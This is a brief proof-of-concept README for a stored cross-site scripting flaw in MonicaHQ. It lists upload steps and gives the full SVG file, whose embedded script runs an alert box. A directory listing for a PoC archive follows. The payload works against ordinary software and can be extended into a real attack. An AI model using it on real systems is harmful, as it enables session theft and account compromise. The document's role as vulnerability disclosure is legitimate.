# MonicaHQ XSS
## Exploitation of MonicaHQ XSS
- Create an account
- Create a contact
- In Documents, upload a malicious SVG file
```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("Monicahq XSS Poc");
</script>
</svg>
```
- Access the uploaded file

[4.0K] /data/pocs/60e7492b8f32795c2c32a045815a6dd8c7ff3c61
├── [8.9M] monicahqpoc.zip
└── [ 659] README.md
0 directories, 2 files